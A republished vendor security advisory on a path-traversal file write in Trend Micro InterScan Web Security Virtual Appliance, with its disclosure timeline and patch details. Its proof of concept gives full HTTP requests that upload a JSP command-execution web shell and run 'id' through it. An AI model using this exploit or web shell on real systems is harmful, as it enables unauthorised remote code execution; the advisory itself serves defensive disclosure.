The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
None
C
There is no impact on the confidentiality of the system; the attacker does not gain the ability to read any data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
None
A
There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.
Trendmicro InterScan 6.5-SP2_Build_Linux_1548 Arbitrary File WriteKL-001-2017-001 : Trendmicro InterScan Arbitrary File Write
Title: Trendmicro InterScan Arbitrary File Write
Advisory ID: KL-001-2017-001
Publication Date: 2017.02.15
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-001.txt
1. Vulnerability Details
Affected Vendor: Trendmicro
Affected Product: InterScan Web Security Virtual Appliance
Affected Version: OS Version 3.5.1321.el6.x86_64; Application
Version 6.5-SP2_Build_Linux_1548
Platform: Embedded Linux
CWE Classification: CWE-22: Improper Limitation of a Pathname to
a Restricted Directory ('Path Traversal'),
CWE-434: Unrestricted Upload of File with
Dangerous Type
Impact: Remote Code Execution
Attack vector: HTTP
2. Vulnerability Description
An authenticated user can create files on the local system.
This can lead to remote command execution as an authenticated
user.
3. Technical Description
A servlet takes an arbitrary file path as an output filename,
and the webserver can create files in the webroot. So, a
malicious .jsp can be uploaded and then executed through a
subsequent request to the webserver. Shell courtesy the
fuzzdb-project
(https://github.com/fuzzdb-project/fuzzdb/blob/master/web-backdoors/jsp/cmd.jsp).
POST /servlet/com.trend.iwss.gui.servlet.ConfigBackup?action=upload_check
HTTP/1.1
Host: 1.3.3.7:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0)
Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://1.3.3.7:8443/config_backup_collapsed.jsp
Cookie: JSESSIONID=E600D5296A2282C4C7AD46BCDAADEB47
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data;
boundary=---------------------------135470425518767155135967265
Content-Length: 1486
-----------------------------135470425518767155135967265
Content-Disposition: form-data; name="CSRFGuardToken"
4POCBRSFC1TYEO2D5IHNLLJAX27BNBLF
-----------------------------135470425518767155135967265
Content-Disposition: form-data; name="op"
save
-----------------------------135470425518767155135967265
Content-Disposition: form-data; name="uploadfile";
filename="../../../../usr/iwss/AdminUI/tomcat/webapps/ROOT/korelogic.jsp"
<%@ page import="java.util.*,java.io.*"%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
-----------------------------135470425518767155135967265
Content-Disposition: form-data; name="beFullyOrPartially"
0
-----------------------------135470425518767155135967265--
HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
Location:
https://1.3.3.7:8443/config_backup_collapsed.jsp?CSRFGuardToken=4POCBRSFC1TYEO2D5IHNLLJAX27BNBLF&errorMessage=6
Content-Length: 0
Date: Tue, 25 Oct 2016 14:36:07 GMT
Connection: close
GET /korelogic.jsp?CSRFGuardToken=4POCBRSFC1TYEO2D5IHNLLJAX27BNBLF&cmd=id HTTP/1.1
Host: 1.3.3.7:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://1.3.3.7:8443/korelogic.jsp
Cookie: JSESSIONID=E600D5296A2282C4C7AD46BCDAADEB47
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Length: 320
Date: Tue, 25 Oct 2016 14:37:58 GMT
Connection: close
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<input type="hidden" name="CSRFGuardToken" value="4POCBRSFC1TYEO2D5IHNLLJAX27BNBLF">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
Command: id<BR>
uid=498(iscan) gid=499(iscan) groups=499(iscan)
</pre>
</BODY></HTML>
4. Mitigation and Remediation Recommendation
The vendor has issued a patch for this vulnerability in Version
6.5 CP 1737. Security advisory and link to the patched version
available at:
https://success.trendmicro.com/solution/1116672
5. Credit
This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.
6. Disclosure Timeline
2016.12.12 - KoreLogic sends vulnerability report and PoC to
Trendmicro.
2016.12.15 - Trendmicro acknowledges receipt of report.
2017.01.11 - Trendmicro informs KoreLogic that the patch to
this and other KoreLogic reported issues will
likely be available after the 45 business day
deadline (2017.02.16).
2017.02.06 - Trendmicro informs KoreLogic that the patched
version will be available by 2017.02.14.
2017.02.14 - Trendmicro security advisory released.
2017.02.15 - KoreLogic public disclosure.
7. Proof of Concept
See 3. Technical Description.
The contents of this advisory are copyright(c) 2017
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum